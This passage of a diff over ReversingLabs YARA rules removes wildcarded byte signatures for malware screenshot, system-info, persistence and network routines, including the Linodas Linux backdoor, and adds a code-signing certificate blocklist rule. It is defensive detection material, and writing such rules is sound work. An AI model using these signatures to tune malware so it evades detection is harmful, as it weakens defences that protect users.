-        }
-		$get_disk_information_p6 = {
-            EC ?? 44 89 64 24 ?? 33 C0 0F 11 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B 8C 24
-            ?? ?? ?? ?? 8B C1 24 ?? 3C ?? 74 ?? 48 8B 84 24 ?? ?? ?? ?? 4C 8B 00 4D 85 C0 74 ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B 10 4C 3B 84 24 ?? ?? ?? ?? 4C 0F 42 84 24 ?? ?? ?? ??
-            4C 2B C2 EB ?? F6 C1 ?? 75 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 8B 10 48 8B 84 24 ?? ?? ?? ?? 4C 63 00 4C 2B C2 4C 03 C1 EB ??
-            4C 8B 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 0F BA F4 ?? 41 83 CC ?? 44 89 64
-            24 ?? 48 8D 54 24 ?? 49 83 FA ?? 48 0F 47 54 24 ?? 4D 8B C1 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ??
-            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
-            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48
-            8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48
-            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 0F B6 44 24 ?? FE C0 8B B4 24
-        }
-		$get_os_information_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
-            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 48 89 4C 24 ??
-            33 F6 89 74 24 ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F
-            84 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 4C 24 ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ??
-            E8 ?? ?? ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 44
-            24 ?? 45 33 C9 45 33 C0 8B 54 24 ?? 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 48 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 8B 54 24 ?? E8 ?? ??
-            ?? ?? 48 8B C8 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8D 54 24 ?? EB ?? 48
-        }
-		$get_os_information_p2 = {
-            8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 07 48 89 77
-            ?? 48 C7 47 ?? ?? ?? ?? ?? 66 89 37 C7 44 24 ?? ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 8B
-            C1 24 ?? 3C ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 10 48 85 D2 74 ?? 48 8B 85 ?? ?? ??
-            ?? 4C 8B 08 48 3B 95 ?? ?? ?? ?? 48 0F 42 95 ?? ?? ?? ?? 49 2B D1 EB ?? F6 C1 ?? 75
-            ?? 48 8B 85 ?? ?? ?? ?? 48 8B 08 48 85 C9 74 ?? 48 8B 85 ?? ?? ?? ?? 4C 8B 08 48 8B
-            85 ?? ?? ?? ?? 48 63 10 48 03 D2 49 2B D1 48 03 D1 49 8B C1 48 D1 FA 48 85 C0 74 ??
-            48 8B CF 48 83 FA ?? 77 ?? 48 89 57 ?? 48 8D 1C 12 4C 8B C3 49 8B D1 E8 ?? ?? ?? ??
-            66 89 34 3B EB ?? E8 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C7 48
-            8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 5D C3
-        }
-		$take_screenshot_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 8B FA 33 DB 48 8B 05 ?? ?? ?? ?? 48
-            89 84 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 4C 8B F8 48 89 84 24 ?? ?? ?? ?? 48 8B
-            C8 FF 15 ?? ?? ?? ?? 48 8B F0 48 89 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 41 BC
-            ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 44 8B A4 24 ?? ?? ?? ?? 44 8B AC 24 ?? ?? ?? ?? 45 8B C5 41 8B
-            D4 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 89 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 4C 89 7C 24 ?? 44 89 6C 24 ??
-            45 8B CC 45 33 C0 33 D2 48 8B CE FF 15 ?? ?? ?? ?? 8B CF 41 0F AF CC B8 ?? ?? ?? ??
-            F7 E9 44 8B F2 41 D1 FE 41 8B CE C1 E9 ?? 44 03 F1 41 0F AF FD B8 ?? ?? ?? ?? F7 EF
-            8B F2 D1 FE 8B C6 C1 E8 ?? 03 F0 44 8B C6 41 8B D6 49 8B CF FF 15 ?? ?? ?? ?? 4C 8B
-            F8 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 49 8B D7 48 8B C8 FF 15 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 44 89 64 24 ?? 89 5C 24 ?? 89 5C 24 ??
-            48 8B 44 24 ?? 48 89 44 24 ?? 89 74 24 ?? 45 8B CE 45 33 C0 33 D2 48 8B CF FF 15 ??
-            ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ??
-            ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 89 9C 24 ??
-            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 8D 48 ?? FF 15 ?? ?? ??
-            ?? FF 47 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ?? 90 4C 89 BC 24 ?? ?? ?? ?? 4C 8D 84 24 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C6 84
-        }
-		$take_screenshot_p2 = {
-            24 ?? ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ??
-            45 8B C8 41 F7 D9 45 0F 48 C8 44 89 8C 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? 0F AF C1 83 C0 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? C1 E0 ?? 89 84 24 ?? ??
-            ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 45 85 C0 7E ?? 41 8D 49 ?? 0F
-            AF C8 48 63 D1 49 03 D2 48 89 94 24 ?? ?? ?? ?? F7 D8 89 84 24 ?? ?? ?? ?? EB ?? C6
-            84 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 0F B7 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 9C 24 ?? ?? ??
-            ?? 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            48 89 9C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
-            ?? ?? 48 8B 01 45 33 C0 48 8D 94 24 ?? ?? ?? ?? FF 50 ?? 44 8B A4 24 ?? ?? ?? ?? 48
-            8B 8C 24 ?? ?? ?? ?? 48 8B 01 45 33 C9 45 33 C0 48 8B D3 FF 50 ?? 41 8B CC E8 ?? ??
-            ?? ?? 4C 8B E8 89 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 01 4C 8D 8C 24 ??
-            ?? ?? ?? 45 8B C4 49 8B D5 FF 50 ?? 4C 8D 8C 24 ?? ?? ?? ?? 45 8B C4 0F 1F 40 ?? 66
-            0F 1F 84 00 ?? ?? 00 00 49 FF C9 B8 ?? ?? ?? ?? 41 F7 E0 C1 EA ?? 0F B6 C2 C0 E0 ??
-            8D 0C 10 02 C9 44 2A C1 41 80 C0 ?? 45 88 01 44 8B C2 85 D2 75 ?? 4C 8D 84 24 ?? ??
-            ?? ?? 49 8B D1 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 4C 8B 44 24 ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B C1 49 2B C0 4C 8D 35 ?? ?? ?? ?? 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 49 8D 40 ??
-            48 89 44 24 ?? 48 8D 7C 24 ?? 48 83 F9 ?? 48 0F 47 7C 24 ?? 48 8D 05 ?? ?? ?? ?? 48
-            3B C7 76 ?? 4A 8D 04 07 4C 3B F0 77 ?? BE ?? ?? ?? ?? 49 3B FE 77 ?? 4C 8B FB EB
-        }
-		$take_screenshot_p3 = {
-            4C 8B FF 4D 2B FE EB ?? BE ?? ?? ?? ?? 44 8B FE 48 8D 4F ?? 49 FF C0 48 8B D7 E8 ??
-            ?? ?? ?? 4D 8B C7 49 8B D6 48 8B CF E8 ?? ?? ?? ?? 4A 8D 0C 3F 49 2B F7 49 8D 56 ??
-            49 03 D7 4C 8B C6 E8 ?? ?? ?? ?? 48 8D 44 24 ?? EB ?? BE ?? ?? ?? ?? 48 89 74 24 ??
-            4C 89 74 24 ?? 8B D6 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ??
-            48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F
-            10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 48 89 58 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 48 8B
-            94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ?? ??
-            48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C3 4C 8B 8C 24
-            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 4D 85 C9 0F 84 ?? ?? ??
-            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
-            0F BE 0C 01 81 F9 ?? ?? ?? ?? 73 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8
-            80 3C 01 ?? 74 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 80 3C 01 ?? 74 ??
-            48 8D 8C 24 ?? ?? ?? ?? 48 83 FA ?? 49 0F 47 C8 48 8D 94 24 ?? ?? ?? ?? 48 83 BC 24
-            ?? ?? ?? ?? ?? 48 0F 47 94 24 ?? ?? ?? ?? 0F B6 0C 01 80 F1 ?? 88 0C 02 48 8B 94 24
-            ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 FF C0 49 3B C1 0F 82
-            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 49 8B C0 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 4D 8B 40 ?? 49 2B C0 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 49 8B C8 E8 ?? ??
-            ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 8C 24 ?? ?? ?? ?? 0F 11
-        }
-		$take_screenshot_p4 = {
-            8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 66 49 0F 7E C1 66 0F 73 D9 ?? 66 48 0F 7E
-            C8 48 83 F8 ?? 49 0F 47 D1 45 33 C9 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 8B C4 49 8B D5 48 8B 8C 24
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B 01 FF 50 ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 4C 24 ??
-            FF 15 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ??
-            ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 90 48 8B 94 24 ?? ?? ?? ??
-            48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
-            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B F8 48 8D 48 ?? FF 15 ?? ?? ?? ?? 83 6F ?? ?? 75 ?? 48 8D 4F ?? FF 15 ?? ?? ?? ??
-            48 8B 0F 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 48 89 1F 48 8D 4F ?? FF 15 ?? ?? ?? ?? 48
-            8D 4F ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D
-            9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $get_disk_information_p* ) ) and ( all of ( $get_os_information_p* ) ) and ( all of ( $take_screenshot_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Python Software Foundation" and pe.signatures [ i ] . serial == "2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Linodas backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b197346-abce-5cff-938f-bb8742e03168"
-		date = "2024-05-22"
-		modified = "2024-05-22"
+		id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10444-L10460"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Linodas"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$persistence_mechanism_ubuntu = {
-            41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89
-            EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48
-            89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48
-            81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48
-            89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ??
-            48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ??
-            48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ??
-            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F
-            85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7
-            E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F
-            85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24
-            ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48
-            89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ??
-            48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49
-            39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
-        }
-		$network_communication_1 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ??
-            ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D
-            6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ??
-            ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45
-            ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ??
-            41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ??
-            48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24
-            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$network_communication_2 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ??
-            ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ??
-            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83
-            78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ??
-            4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48
-            8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74
-            ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6
-            EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C
-            24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3
-        }
-		$persistence_mechanism_redhat_v11 = {
-            41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24
-            ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C
-            24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74
-            24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8
-            ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ??
-            ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9
-            ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ??
-            ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9
-            BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24
-            48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ??
-            ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85
-            ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41
-            5E 41 5F C3
-        }
-		$change_timestamp_and_read_config_v11 = {
-            55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ??
-            ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85
